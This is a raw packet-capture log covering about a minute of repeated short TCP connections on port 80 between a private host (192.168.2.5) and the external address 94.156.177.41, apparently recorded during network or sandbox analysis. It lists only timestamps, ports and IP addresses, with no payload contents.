Nov 28, 2024 13:52:35.421514988 CET	80	49757	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:35.425400972 CET	49757	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:35.545322895 CET	80	49757	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:36.795099020 CET	80	49757	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:36.795233965 CET	49757	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:36.795247078 CET	80	49757	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:36.795296907 CET	49757	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:36.915263891 CET	80	49757	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:36.933563948 CET	49762	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:37.054387093 CET	80	49762	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:37.054483891 CET	49762	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:37.057039022 CET	49762	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:37.177629948 CET	80	49762	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:37.177766085 CET	49762	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:37.297760963 CET	80	49762	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:38.452260017 CET	80	49762	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:38.452387094 CET	80	49762	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:38.452387094 CET	49762	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:38.452430964 CET	49762	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:38.578088999 CET	80	49762	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:38.586529016 CET	49768	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:38.708134890 CET	80	49768	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:38.708219051 CET	49768	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:38.711698055 CET	49768	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:38.835963964 CET	80	49768	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:38.836045027 CET	49768	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:38.956157923 CET	80	49768	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:40.153877020 CET	80	49768	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:40.153987885 CET	80	49768	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:40.154059887 CET	49768	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:40.154089928 CET	49768	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:40.274183035 CET	80	49768	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:40.290272951 CET	49771	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:40.410156012 CET	80	49771	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:40.410284996 CET	49771	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:40.412333965 CET	49771	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:40.534276009 CET	80	49771	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:40.534388065 CET	49771	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:40.657191992 CET	80	49771	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:41.957781076 CET	80	49771	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:41.957886934 CET	80	49771	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:41.957950115 CET	49771	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:41.957976103 CET	49771	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:42.077928066 CET	80	49771	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:42.104523897 CET	49775	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:42.225953102 CET	80	49775	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:42.226061106 CET	49775	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:42.228101015 CET	49775	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:42.351701975 CET	80	49775	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:42.351772070 CET	49775	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:42.474380016 CET	80	49775	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:43.776398897 CET	80	49775	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:43.776505947 CET	80	49775	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:43.776504993 CET	49775	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:43.776551008 CET	49775	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:43.903449059 CET	80	49775	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:43.926228046 CET	49781	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:44.046363115 CET	80	49781	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:44.046511889 CET	49781	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:44.048556089 CET	49781	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:44.168471098 CET	80	49781	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:44.168555021 CET	49781	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:44.288804054 CET	80	49781	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:45.678314924 CET	80	49781	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:45.678417921 CET	49781	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:45.678484917 CET	80	49781	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:45.678550959 CET	49781	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:45.798995018 CET	80	49781	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:45.824033022 CET	49785	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:45.944864035 CET	80	49785	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:45.944978952 CET	49785	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:45.947307110 CET	49785	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:46.067440033 CET	80	49785	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:46.067495108 CET	49785	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:46.187515020 CET	80	49785	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:47.491398096 CET	80	49785	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:47.491806030 CET	49785	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:47.491817951 CET	80	49785	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:47.491868973 CET	49785	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:47.611902952 CET	80	49785	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:47.764138937 CET	49791	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:47.884305000 CET	80	49791	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:47.884396076 CET	49791	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:47.887581110 CET	49791	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:48.007499933 CET	80	49791	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:48.007586002 CET	49791	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:48.127535105 CET	80	49791	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:49.519181013 CET	80	49791	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:49.519218922 CET	80	49791	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:49.519282103 CET	49791	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:49.519303083 CET	49791	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:49.639319897 CET	80	49791	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:49.670295000 CET	49797	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:49.791802883 CET	80	49797	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:49.791889906 CET	49797	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:49.794187069 CET	49797	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:49.915704012 CET	80	49797	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:49.915880919 CET	49797	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:50.037153006 CET	80	49797	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:51.273123980 CET	80	49797	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:51.273288012 CET	80	49797	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:51.273382902 CET	49797	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:51.273431063 CET	49797	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:51.399558067 CET	80	49797	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:51.418231010 CET	49801	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:51.540576935 CET	80	49801	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:51.540676117 CET	49801	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:51.543040037 CET	49801	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:51.663068056 CET	80	49801	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:51.665644884 CET	49801	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:51.785608053 CET	80	49801	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:53.173119068 CET	80	49801	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:53.173233032 CET	80	49801	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:53.173276901 CET	49801	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:53.173302889 CET	49801	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:53.296816111 CET	80	49801	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:53.398643970 CET	49806	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:53.525336981 CET	80	49806	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:53.525492907 CET	49806	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:53.608174086 CET	49806	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:53.728264093 CET	80	49806	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:53.728328943 CET	49806	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:53.848242998 CET	80	49806	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:55.119847059 CET	80	49806	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:55.119863033 CET	80	49806	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:55.119927883 CET	49806	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:55.119971991 CET	49806	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:55.240088940 CET	80	49806	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:55.285762072 CET	49811	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:55.405879974 CET	80	49811	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:55.405983925 CET	49811	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:55.408077955 CET	49811	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:55.528985977 CET	80	49811	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:55.529062986 CET	49811	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:55.649151087 CET	80	49811	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:57.817408085 CET	80	49811	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:57.817527056 CET	80	49811	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:57.817540884 CET	49811	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:57.817565918 CET	49811	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:57.940551996 CET	80	49811	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:57.963830948 CET	49818	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:58.083899975 CET	80	49818	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:58.087631941 CET	49818	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:58.090461969 CET	49818	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:58.217525959 CET	80	49818	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:58.217591047 CET	49818	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:58.339019060 CET	80	49818	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:59.638304949 CET	80	49818	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:59.638396025 CET	80	49818	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:59.638447046 CET	49818	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:59.640294075 CET	49818	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:59.760272026 CET	80	49818	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:00.071474075 CET	49824	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:00.191495895 CET	80	49824	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:00.191607952 CET	49824	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:00.214221001 CET	49824	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:00.334182024 CET	80	49824	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:00.334230900 CET	49824	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:00.454245090 CET	80	49824	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:01.635416031 CET	80	49824	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:01.635518074 CET	49824	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:01.762258053 CET	80	49824	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:01.762326002 CET	49824	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:01.776576996 CET	49829	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:01.897770882 CET	80	49829	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:01.897862911 CET	49829	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:01.899885893 CET	49829	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:02.019817114 CET	80	49829	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:02.019879103 CET	49829	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:02.141514063 CET	80	49829	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:03.487888098 CET	80	49829	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:03.488022089 CET	80	49829	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:03.488070965 CET	49829	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:03.488100052 CET	49829	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:03.610341072 CET	80	49829	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:03.636023045 CET	49833	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:03.756031036 CET	80	49833	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:03.756159067 CET	49833	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:03.758269072 CET	49833	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:03.878302097 CET	80	49833	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:03.878355980 CET	49833	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:04.000163078 CET	80	49833	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:05.350589037 CET	80	49833	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:05.350677967 CET	80	49833	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:05.350722075 CET	49833	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:05.350722075 CET	49833	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:05.477094889 CET	80	49833	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:05.495654106 CET	49837	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:05.615586996 CET	80	49837	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:05.615715027 CET	49837	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:05.617727041 CET	49837	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:05.737843037 CET	80	49837	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:05.737922907 CET	49837	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:05.858086109 CET	80	49837	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:07.207684994 CET	80	49837	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:07.207825899 CET	49837	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:07.207875967 CET	80	49837	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:07.207930088 CET	49837	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:07.328140020 CET	80	49837	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:07.353461981 CET	49840	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:07.473495007 CET	80	49840	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:07.473633051 CET	49840	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:07.475994110 CET	49840	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:07.602524996 CET	80	49840	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:07.602576971 CET	49840	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:07.722445011 CET	80	49840	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:09.113989115 CET	80	49840	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:09.114079952 CET	80	49840	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:09.114131927 CET	49840	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:09.115322113 CET	49840	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:09.234121084 CET	80	49840	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:09.260416985 CET	49845	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:09.383857012 CET	80	49845	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:09.383955002 CET	49845	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:09.386234045 CET	49845	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:09.650331974 CET	80	49845	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:09.650403023 CET	49845	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:09.770457983 CET	80	49845	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:11.552810907 CET	80	49845	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:11.552901030 CET	49845	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:11.552995920 CET	80	49845	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:11.553039074 CET	49845	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:11.676387072 CET	80	49845	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:11.698553085 CET	49851	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:11.818586111 CET	80	49851	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:11.819780111 CET	49851	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:11.821815968 CET	49851	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:11.942590952 CET	80	49851	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:11.943752050 CET	49851	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:12.070787907 CET	80	49851	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:13.408107996 CET	80	49851	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:13.408227921 CET	49851	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:13.408437967 CET	80	49851	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:13.408480883 CET	49851	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:13.531949043 CET	80	49851	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:13.544383049 CET	49857	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:13.664429903 CET	80	49857	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:13.664522886 CET	49857	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:13.666663885 CET	49857	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:13.787149906 CET	80	49857	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:13.787378073 CET	49857	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:13.913170099 CET	80	49857	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:15.302839041 CET	80	49857	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:15.302966118 CET	80	49857	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:15.303148031 CET	49857	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:15.303148031 CET	49857	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:15.423125982 CET	80	49857	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:15.448590040 CET	49862	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:15.572721958 CET	80	49862	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:15.572932005 CET	49862	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:15.575089931 CET	49862	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:15.696774960 CET	80	49862	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:15.696851015 CET	49862	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:15.823607922 CET	80	49862	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:16.968163013 CET	80	49862	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:16.968300104 CET	80	49862	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:16.968395948 CET	49862	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:16.968498945 CET	49862	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:17.088675976 CET	80	49862	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:17.133513927 CET	49867	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:17.255908012 CET	80	49867	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:17.255989075 CET	49867	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:17.259123087 CET	49867	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:17.383563995 CET	80	49867	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:17.383644104 CET	49867	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:17.508913040 CET	80	49867	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:18.852303982 CET	80	49867	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:18.852405071 CET	80	49867	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:18.852418900 CET	49867	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:18.852457047 CET	49867	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:18.978806973 CET	80	49867	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:18.995060921 CET	49871	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:19.116089106 CET	80	49871	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:19.116161108 CET	49871	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:19.118278027 CET	49871	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:19.396064997 CET	80	49871	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:19.396127939 CET	49871	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:19.516808033 CET	80	49871	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:20.909887075 CET	80	49871	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:20.909991026 CET	80	49871	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:20.910012960 CET	49871	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:20.910048962 CET	49871	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:21.030550957 CET	80	49871	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:21.058099985 CET	49877	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:21.177999973 CET	80	49877	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:21.178078890 CET	49877	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:21.180269957 CET	49877	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:21.300930977 CET	80	49877	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:21.301001072 CET	49877	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:21.425290108 CET	80	49877	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:22.780473948 CET	80	49877	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:22.780591965 CET	80	49877	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:22.780608892 CET	49877	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:22.780639887 CET	49877	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:22.903350115 CET	80	49877	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:22.917458057 CET	49882	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:23.037374020 CET	80	49882	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:23.037475109 CET	49882	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:23.039669991 CET	49882	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:23.160178900 CET	80	49882	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:23.160248041 CET	49882	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:23.280353069 CET	80	49882	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:24.492685080 CET	80	49882	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:24.492793083 CET	80	49882	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:24.492850065 CET	49882	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:24.500430107 CET	49882	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:24.624212980 CET	80	49882	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:24.693820000 CET	49888	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:24.815710068 CET	80	49888	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:24.815824986 CET	49888	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:24.817872047 CET	49888	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:24.944817066 CET	80	49888	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:24.944914103 CET	49888	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:25.065090895 CET	80	49888	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:26.320647955 CET	80	49888	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:26.320710897 CET	80	49888	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:26.320756912 CET	49888	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:26.320777893 CET	49888	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:26.440821886 CET	80	49888	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:26.461939096 CET	49893	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:26.583791018 CET	80	49893	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:26.583920002 CET	49893	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:26.586136103 CET	49893	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:26.713036060 CET	80	49893	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:26.713138103 CET	49893	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:26.833132982 CET	80	49893	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:28.140003920 CET	80	49893	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:28.140192032 CET	80	49893	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:28.140273094 CET	49893	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:28.140294075 CET	49893	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:28.260281086 CET	80	49893	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:28.282196999 CET	49897	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:28.402199984 CET	80	49897	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:28.406024933 CET	49897	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:28.407987118 CET	49897	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:28.528054953 CET	80	49897	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:28.528183937 CET	49897	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:28.648130894 CET	80	49897	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:30.067215919 CET	80	49897	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:30.067284107 CET	80	49897	94.156.177.41	192.168.2.5
